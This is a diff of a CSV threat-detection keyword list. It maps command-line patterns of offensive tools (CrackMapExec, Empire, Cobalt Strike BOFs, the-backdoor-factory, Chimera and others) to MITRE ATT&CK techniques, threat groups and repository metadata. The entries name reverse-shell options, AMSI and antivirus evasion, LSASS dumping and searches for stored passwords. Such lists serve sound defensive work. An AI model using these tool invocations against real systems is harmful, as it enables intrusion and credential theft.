tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","7683","1597","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" +"* enum_dns*","offensive_tool_keyword","crackmapexec","crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","7683","1597","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" +"* -Enumerate * -Module *","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"* --enum-local-admins*","offensive_tool_keyword","krbrelayx","Kerberos unconstrained delegation abuse toolkit","T1558.003 - T1098","TA0004 - TA0006","N/A","N/A","Exploitation Tools","https://github.com/dirkjanm/krbrelayx","1","0","N/A","N/A","10","902","148","2023-09-07T20:11:36Z","2019-01-08T18:42:07Z" "* epmd-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* eppc-enum-processes.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* EternalHushCore *","offensive_tool_keyword","EternalHushFramework","EternalHush Framework is a new open source project that is an advanced C&C framework. Designed specifically for Windows operating systems","T1071.001 - T1132.001 - T1059.003 - T1547.001","TA0011 - TA0005 - TA0010 - TA0002","N/A","N/A","C2","https://github.com/APT64/EternalHushFramework","1","0","N/A","10","10","140","21","2023-09-21T19:04:41Z","2023-07-09T09:13:21Z" "* etumbot.py*","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tools","https://github.com/FortyNorthSecurity/Egress-Assess","1","0","can be used for data exfiltration simulation","8","6","546","141","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z" "* EtwHash*","offensive_tool_keyword","ETWHash","C# POC to extract NetNTLMv1/v2 hashes from ETW provider","T1556.001","TA0009 ","N/A","N/A","Credential Access","https://github.com/nettitude/ETWHash","1","0","N/A","N/A","3","229","27","2023-05-10T06:45:06Z","2023-04-26T15:53:01Z" -"* -eval *caplets.update* ui.update*","offensive_tool_keyword","bettercap","The Swiss Army knife for 802.11 - BLE - IPv4 and IPv6 networks reconnaissance and MITM attacks.","T1046 - T1190 - T1059 - T1053 - T1001.002 - T1110.001 - T1113 - T1132 - T1048","TA0010 - TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","Network Exploitation tools","https://github.com/bettercap/bettercap","1","0","N/A","N/A","10","14623","1372","2023-09-18T15:43:34Z","2018-01-07T15:30:41Z" +"* -eval *caplets.update* ui.update*","offensive_tool_keyword","bettercap","The Swiss Army knife for 802.11 - BLE - IPv4 and IPv6 networks reconnaissance and MITM attacks.","T1046 - T1190 - T1059 - T1053 - T1001.002 - T1110.001 - T1113 - T1132 - T1048","TA0010 - TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","Network Exploitation tools","https://github.com/bettercap/bettercap","1","0","N/A","N/A","10","14627","1373","2023-09-18T15:43:34Z","2018-01-07T15:30:41Z" "* EventViewer-UACBypass*","offensive_tool_keyword","EventViewer-UACBypass","RCE through Unsafe .Net Deserialization in Windows Event Viewer which leads to UAC bypass","T1078.004 - T1216 - T1068","TA0004 - TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/CsEnox/EventViewer-UACBypass","1","0","N/A","10","2","108","21","2022-04-29T09:42:37Z","2022-04-27T12:56:59Z" "* evil.corp *","offensive_tool_keyword","spoolsploit","A collection of Windows print spooler exploits containerized with other utilities for practical exploitation.","T1204 - T1547 - T1562 - T1003 - T1018 - T1570 - T1005","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009","N/A","N/A","Exploitation tools","https://github.com/BeetleChunks/SpoolSploit","1","0","N/A","N/A","6","533","90","2021-07-16T04:49:43Z","2021-07-07T00:32:28Z" "* EvilClippyManager*","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","0","N/A","10","10","334","84","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" -"* evilginx*","offensive_tool_keyword","gophish","Combination of evilginx2 and GoPhish","T1565-002 - T1565-003 - T1565-012 - T1110 - T1056-001 - T1113","TA0002 - TA0003","N/A","N/A","Credential Access - Collection","https://github.com/fin3ss3g0d/evilgophish","1","0","N/A","N/A","10","1308","237","2023-09-13T23:44:48Z","2022-09-07T02:47:43Z" -"* EvilTwinServer *","offensive_tool_keyword","EvilLsassTwin","attempt to duplicate open handles to LSASS. If this fails it will obtain a handle to LSASS through the NtGetNextProcess function instead of OpenProcess/NtOpenProcess.","T1003.001 - T1055 - T1093","TA0006 - TA0005 - TA0002","N/A","N/A","Credential Access - Defense Evasion","https://github.com/RePRGM/Nimperiments/tree/main/EvilLsassTwin","1","0","N/A","9","1","39","3","2023-09-11T14:03:21Z","2022-09-13T12:42:13Z" -"* -ExchHostname * -Password *","offensive_tool_keyword","MailSniper","MailSniper is a penetration testing tool for searching through email in a Microsoft Exchange environment for specific terms (passwords. insider intel. network architecture information. etc.). It can be used as a non-administrative user to search their own email. or by an administrator to search the mailboxes of every user in a domain.","T1114 - T1134.002","TA0005 - TA0006","N/A","N/A","Credential Access","https://github.com/dafthack/MailSniper/blob/master/MailSniper.ps1","1","0","N/A","N/A","10","2625","554","2022-10-20T08:13:33Z","2016-09-08T00:36:51Z" -"* --excludedcs*","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1057 - T1059 - T1053","TA0003 - TA0008 - TA0009","N/A","N/A","Reconnaissance","https://github.com/BloodHoundAD/SharpHound","1","0","N/A","N/A","5","440","124","2023-09-28T19:43:14Z","2021-07-12T17:07:04Z" +"* evilginx*","offensive_tool_keyword","gophish","Combination of evilginx2 and GoPhish","T1565-002 - T1565-003 - T1565-012 - T1110 - T1056-001 - T1113","TA0002 - TA0003","N/A","N/A","Credential Access - Collection","https://github.com/fin3ss3g0d/evilgophish","1","0","N/A","N/A","10","1308","237","2023-10-04T15:18:07Z","2022-09-07T02:47:43Z" +"* EvilTwinServer *","offensive_tool_keyword","EvilLsassTwin","attempt to duplicate open handles to LSASS. If this fails it will obtain a handle to LSASS through the NtGetNextProcess function instead of OpenProcess/NtOpenProcess.","T1003.001 - T1055 - T1093","TA0006 - TA0005 - TA0002","N/A","N/A","Credential Access - Defense Evasion","https://github.com/RePRGM/Nimperiments/tree/main/EvilLsassTwin","1","0","N/A","9","1","39","3","2023-10-04T21:33:57Z","2022-09-13T12:42:13Z" +"* -ExchHostname * -Password *","offensive_tool_keyword","MailSniper","MailSniper is a penetration testing tool for searching through email in a Microsoft Exchange environment for specific terms (passwords. insider intel. network architecture information. etc.). It can be used as a non-administrative user to search their own email. or by an administrator to search the mailboxes of every user in a domain.","T1114 - T1134.002","TA0005 - TA0006","N/A","N/A","Credential Access","https://github.com/dafthack/MailSniper/blob/master/MailSniper.ps1","1","0","N/A","N/A","10","2626","554","2022-10-20T08:13:33Z","2016-09-08T00:36:51Z" +"* --excludedcs*","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1057 - T1059 - T1053","TA0003 - TA0008 - TA0009","N/A","N/A","Reconnaissance","https://github.com/BloodHoundAD/SharpHound","1","0","N/A","N/A","5","440","125","2023-10-04T21:38:29Z","2021-07-12T17:07:04Z" "* exclusion.c /Fodefender.o*","offensive_tool_keyword","cobaltstrike","Collection of CobaltStrike beacon object files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/pwn1sher/CS-BOFs","1","0","N/A","10","10","100","23","2022-02-14T09:47:30Z","2021-01-18T08:54:48Z" -"* -ExeArguments *","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"* exec * -p * -c *","offensive_tool_keyword","impersonate-rs","Reimplementation of Defte Impersonate in plain Rust allow you to impersonate any user on the target computer as long as you have administrator privileges (No NT SYSTEM needed) and is usable with and without GUI","T1134 - T1003 - T1008 - T1071","TA0004 - TA0006 - TA0011","N/A","N/A","Exploitation tools","https://github.com/zblurx/impersonate-rs","1","0","N/A","N/A","1","77","4","2023-06-15T15:33:49Z","2023-01-30T17:11:14Z" -"* exec * --pid * --command *","offensive_tool_keyword","impersonate-rs","Reimplementation of Defte Impersonate in plain Rust allow you to impersonate any user on the target computer as long as you have administrator privileges (No NT SYSTEM needed) and is usable with and without GUI","T1134 - T1003 - T1008 - T1071","TA0004 - TA0006 - TA0011","N/A","N/A","Exploitation tools","https://github.com/zblurx/impersonate-rs","1","0","N/A","N/A","1","77","4","2023-06-15T15:33:49Z","2023-01-30T17:11:14Z" +"* -ExeArguments *","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"* exec * -p * -c *","offensive_tool_keyword","impersonate-rs","Reimplementation of Defte Impersonate in plain Rust allow you to impersonate any user on the target computer as long as you have administrator privileges (No NT SYSTEM needed) and is usable with and without GUI","T1134 - T1003 - T1008 - T1071","TA0004 - TA0006 - TA0011","N/A","N/A","Exploitation tools","https://github.com/zblurx/impersonate-rs","1","0","N/A","N/A","1","78","4","2023-06-15T15:33:49Z","2023-01-30T17:11:14Z" +"* exec * --pid * --command *","offensive_tool_keyword","impersonate-rs","Reimplementation of Defte Impersonate in plain Rust allow you to impersonate any user on the target computer as long as you have administrator privileges (No NT SYSTEM needed) and is usable with and without GUI","T1134 - T1003 - T1008 - T1071","TA0004 - TA0006 - TA0011","N/A","N/A","Exploitation tools","https://github.com/zblurx/impersonate-rs","1","0","N/A","N/A","1","78","4","2023-06-15T15:33:49Z","2023-01-30T17:11:14Z" "* exec-command -clear*","offensive_tool_keyword","wmiexec-pro","The new generation of wmiexec.py with new features whole the operations only work with port 135 (don't need smb connection) for AV evasion in lateral movement","T1021.006 - T1560.001","TA0008 - TA0040","N/A","N/A","Network Exploitation tools","https://github.com/XiaoliChan/wmiexec-Pro","1","0","N/A","N/A","8","790","98","2023-07-31T03:58:14Z","2023-04-04T06:24:07Z" "* exec-command -command *","offensive_tool_keyword","wmiexec-pro","The new generation of wmiexec.py with new features whole the operations only work with port 135 (don't need smb connection) for AV evasion in lateral movement","T1021.006 - T1560.001","TA0008 - TA0040","N/A","N/A","Network Exploitation tools","https://github.com/XiaoliChan/wmiexec-Pro","1","0","N/A","N/A","8","790","98","2023-07-31T03:58:14Z","2023-04-04T06:24:07Z" "* exec-command -shell*","offensive_tool_keyword","wmiexec-pro","The new generation of wmiexec.py with new features whole the operations only work with port 135 (don't need smb connection) for AV evasion in lateral movement","T1021.006 - T1560.001","TA0008 - TA0040","N/A","N/A","Network Exploitation tools","https://github.com/XiaoliChan/wmiexec-Pro","1","0","N/A","N/A","8","790","98","2023-07-31T03:58:14Z","2023-04-04T06:24:07Z" @@ -599,35 +599,35 @@ "* --execution false --save True --output *.bin*","offensive_tool_keyword","micr0_shell","micr0shell is a Python script that dynamically generates Windows X64 PIC Null-Free reverse shell shellcode.","T1059.003 - T1027.001","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/senzee1984/micr0_shell","1","0","N/A","9","1","91","12","2023-09-16T02:35:28Z","2023-08-13T02:46:51Z" "* exegol.apk*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" "* exegol.py*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" -"* exe-selfdelete*","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/chvancooten/NimPlant","1","0","N/A","10","10","641","85","2023-08-31T14:52:00Z","2023-02-13T13:42:39Z" +"* exe-selfdelete*","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/chvancooten/NimPlant","1","0","N/A","10","10","643","86","2023-08-31T14:52:00Z","2023-02-13T13:42:39Z" "* Exfil.sh*","offensive_tool_keyword","AutoC2","AutoC2 is a bash script written to install all of the red team tools that you know and love","T1059.004 - T1129 - T1486","TA0005 - TA0002 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/assume-breach/Home-Grown-Red-Team/tree/main/AutoC2","1","0","N/A","10","4","348","73","2023-09-30T13:40:08Z","2022-03-23T15:52:41Z" "* exfiltrate.exe*","offensive_tool_keyword","Executable_Files","Database for custom made as well as publicly available stage-2 or beacons or stageless payloads used by loaders/stage-1/stagers or for further usage of C2 as well","T1071 - T1071.001 - T1105 - T1041 - T1102","TA0011 - TA0005 - TA0010","N/A","N/A","Exploitation tools","https://github.com/reveng007/Executable_Files","1","0","N/A","10","1","7","2","2023-09-07T08:36:28Z","2021-12-10T15:04:35Z" "* Exrop(*/bin/*","offensive_tool_keyword","Exrop","Exrop is automatic ROP chains generator tool which can build gadget chain automatically from given binary and constraints","T1554","TA0003","N/A","N/A","Exploitation tools","https://github.com/d4em0n/exrop","1","0","N/A","N/A","3","265","26","2020-02-21T08:01:06Z","2020-01-19T05:09:00Z" -"* extract --secrets --zsh*","offensive_tool_keyword","PassDetective","PassDetective is a command-line tool that scans shell command history to detect mistakenly written passwords - API keys and secrets","T1059 - T1059.004 - T1552 - T1552.001","TA0004 - TA0005","N/A","N/A","Credential Access","https://github.com/aydinnyunus/PassDetective","1","0","N/A","7","1","51","3","2023-08-16T16:51:15Z","2023-07-22T12:31:57Z" +"* extract --secrets --zsh*","offensive_tool_keyword","PassDetective","PassDetective is a command-line tool that scans shell command history to detect mistakenly written passwords - API keys and secrets","T1059 - T1059.004 - T1552 - T1552.001","TA0004 - TA0005","N/A","N/A","Credential Access","https://github.com/aydinnyunus/PassDetective","1","0","N/A","7","1","52","3","2023-08-16T16:51:15Z","2023-07-22T12:31:57Z" "* --extra-verbose*","offensive_tool_keyword","blackcat ransomware","BlackCat Ransomware behavior","T1486.001 - T1489 - T1490 - T1486","TA0011 - TA0010 - TA0012 - TA0007 - TA0040","blackcat ransomware","N/A","Ransomware","https://www.sentinelone.com/labs/blackcat-ransomware-highly-configurable-rust-driven-raas-on-the-prowl-for-victims/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* -f *.bin -e AMSI*","offensive_tool_keyword","ThreatCheck","Identifies the bytes that Microsoft Defender / AMSI Consumer flags on","T1059.001 - T1059.005 - T1027.002 - T1070.004","TA0002 - TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/rasta-mouse/ThreatCheck","1","0","N/A","N/A","8","781","86","2023-04-04T03:06:16Z","2020-10-08T11:22:26Z" "* -f *.bin -e Defender*","offensive_tool_keyword","ThreatCheck","Identifies the bytes that Microsoft Defender / AMSI Consumer flags on","T1059.001 - T1059.005 - T1027.002 - T1070.004","TA0002 - TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/rasta-mouse/ThreatCheck","1","0","N/A","N/A","8","781","86","2023-04-04T03:06:16Z","2020-10-08T11:22:26Z" "* -f *.exe --encrypt xor --jmp -o *.exe*","offensive_tool_keyword","darkarmour","Store and execute an encrypted windows binary from inside memorywithout a single bit touching disk.","T1055.012 - T1027 - T1564.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/bats3c/darkarmour","1","0","N/A","10","7","644","119","2020-04-13T10:56:23Z","2020-04-06T20:48:20Z" -"* -f *.exe -m onionduke -b *.dll*","offensive_tool_keyword","the-backdoor-factory","Patch PE ELF Mach-O binaries with shellcode new version in development*","T1055.002 - T1055.004 - T1059.001","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/secretsquirrel/the-backdoor-factory","1","0","N/A","10","10","3185","809","2023-08-14T02:52:06Z","2013-05-30T01:04:24Z" -"* -f *.exe -m onionduke -b *.exe*","offensive_tool_keyword","the-backdoor-factory","Patch PE ELF Mach-O binaries with shellcode new version in development*","T1055.002 - T1055.004 - T1059.001","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/secretsquirrel/the-backdoor-factory","1","0","N/A","10","10","3185","809","2023-08-14T02:52:06Z","2013-05-30T01:04:24Z" -"* -f *.ps1 -l 3 -o *.ps1 -v -t powershell*reverse*","offensive_tool_keyword","chimera","Chimera is a PowerShell obfuscation script designed to bypass AMSI and commercial antivirus solutions.","T1027.002 - T1059.001 - T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/tokyoneon/Chimera/","1","0","N/A","10","10","1187","225","2021-11-09T12:39:59Z","2020-09-01T07:42:22Z" +"* -f *.exe -m onionduke -b *.dll*","offensive_tool_keyword","the-backdoor-factory","Patch PE ELF Mach-O binaries with shellcode new version in development*","T1055.002 - T1055.004 - T1059.001","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/secretsquirrel/the-backdoor-factory","1","0","N/A","10","10","3186","809","2023-08-14T02:52:06Z","2013-05-30T01:04:24Z" +"* -f *.exe -m onionduke -b *.exe*","offensive_tool_keyword","the-backdoor-factory","Patch PE ELF Mach-O binaries with shellcode new version in development*","T1055.002 - T1055.004 - T1059.001","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/secretsquirrel/the-backdoor-factory","1","0","N/A","10","10","3186","809","2023-08-14T02:52:06Z","2013-05-30T01:04:24Z" +"* -f *.ps1 -l 3 -o *.ps1 -v -t powershell*reverse*","offensive_tool_keyword","chimera","Chimera is a PowerShell obfuscation script designed to bypass AMSI and commercial antivirus solutions.","T1027.002 - T1059.001 - T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/tokyoneon/Chimera/","1","0","N/A","10","10","1188","225","2021-11-09T12:39:59Z","2020-09-01T07:42:22Z" "* -f Find-AllVulns*","offensive_tool_keyword","SpaceRunner","enables the compilation of a C# program that will execute arbitrary PowerShell code without launching PowerShell processes through the use of runspace.","T1059.001 - T1027","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/Mr-B0b/SpaceRunner","1","0","N/A","7","2","185","38","2020-07-26T10:39:53Z","2020-07-26T09:31:09Z" "* -f Find-PathDLLHijack*","offensive_tool_keyword","SpaceRunner","enables the compilation of a C# program that will execute arbitrary PowerShell code without launching PowerShell processes through the use of runspace.","T1059.001 - T1027","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/Mr-B0b/SpaceRunner","1","0","N/A","7","2","185","38","2020-07-26T10:39:53Z","2020-07-26T09:31:09Z" "* -f Get-DomainGroupMember* -a *-Identity *admin* -Recurse*","offensive_tool_keyword","SpaceRunner","enables the compilation of a C# program that will execute arbitrary PowerShell code without launching PowerShell processes through the use of runspace.","T1059.001 - T1027","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/Mr-B0b/SpaceRunner","1","0","N/A","7","2","185","38","2020-07-26T10:39:53Z","2020-07-26T09:31:09Z" "* -f Invoke-Inveigh*","offensive_tool_keyword","SpaceRunner","enables the compilation of a C# program that will execute arbitrary PowerShell code without launching PowerShell processes through the use of runspace.","T1059.001 - T1027","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/Mr-B0b/SpaceRunner","1","0","N/A","7","2","185","38","2020-07-26T10:39:53Z","2020-07-26T09:31:09Z" -"* -f kirbi *","offensive_tool_keyword","krbrelayx","Kerberos unconstrained delegation abuse toolkit","T1558.003 - T1098","TA0004 - TA0006","N/A","N/A","Exploitation Tools","https://github.com/dirkjanm/krbrelayx","1","0","N/A","N/A","2","900","148","2023-09-07T20:11:36Z","2019-01-08T18:42:07Z" -"* -f passw -e xlsx csv *","offensive_tool_keyword","MANSPIDER","Spider entire networks for juicy files sitting on SMB shares. Search filenames or file content - regex supported!","T1046 - T1021 - T1021.002 - T1114 - T1114.001 - T1083","TA0007 - TA0009 - TA0010","N/A","N/A","Discovery","https://github.com/blacklanternsecurity/MANSPIDER","1","0","N/A","8","8","772","119","2023-10-03T03:50:49Z","2020-03-18T13:27:20Z" -"* -f passw user admin account network login logon cred *","offensive_tool_keyword","MANSPIDER","Spider entire networks for juicy files sitting on SMB shares. Search filenames or file content - regex supported!","T1046 - T1021 - T1021.002 - T1114 - T1114.001 - T1083","TA0007 - TA0009 - TA0010","N/A","N/A","Discovery","https://github.com/blacklanternsecurity/MANSPIDER","1","0","N/A","8","8","772","119","2023-10-03T03:50:49Z","2020-03-18T13:27:20Z" -"* -f psexec.exe -H * -P * -s reverse_shell_tcp*","offensive_tool_keyword","the-backdoor-factory","Patch PE ELF Mach-O binaries with shellcode new version in development*","T1055.002 - T1055.004 - T1059.001","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/secretsquirrel/the-backdoor-factory","1","0","N/A","10","10","3185","809","2023-08-14T02:52:06Z","2013-05-30T01:04:24Z" -"* -f shells/generic1.ps1 *","offensive_tool_keyword","chimera","Chimera is a PowerShell obfuscation script designed to bypass AMSI and commercial antivirus solutions.","T1027.002 - T1059.001 - T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/tokyoneon/Chimera/","1","0","N/A","10","10","1187","225","2021-11-09T12:39:59Z","2020-09-01T07:42:22Z" -"* -f tcpview.exe -s iat_reverse_tcp_inline -H * -P * -m automatic -C*","offensive_tool_keyword","the-backdoor-factory","Patch PE ELF Mach-O binaries with shellcode new version in development*","T1055.002 - T1055.004 - T1059.001","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/secretsquirrel/the-backdoor-factory","1","0","N/A","10","10","3185","809","2023-08-14T02:52:06Z","2013-05-30T01:04:24Z" -"* -f TeamViewer.exe -H * -P * -s *","offensive_tool_keyword","the-backdoor-factory","Patch PE ELF Mach-O binaries with shellcode new version in development*","T1055.002 - T1055.004 - T1059.001","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/secretsquirrel/the-backdoor-factory","1","0","N/A","10","10","3185","809","2023-08-14T02:52:06Z","2013-05-30T01:04:24Z" +"* -f kirbi *","offensive_tool_keyword","krbrelayx","Kerberos unconstrained delegation abuse toolkit","T1558.003 - T1098","TA0004 - TA0006","N/A","N/A","Exploitation 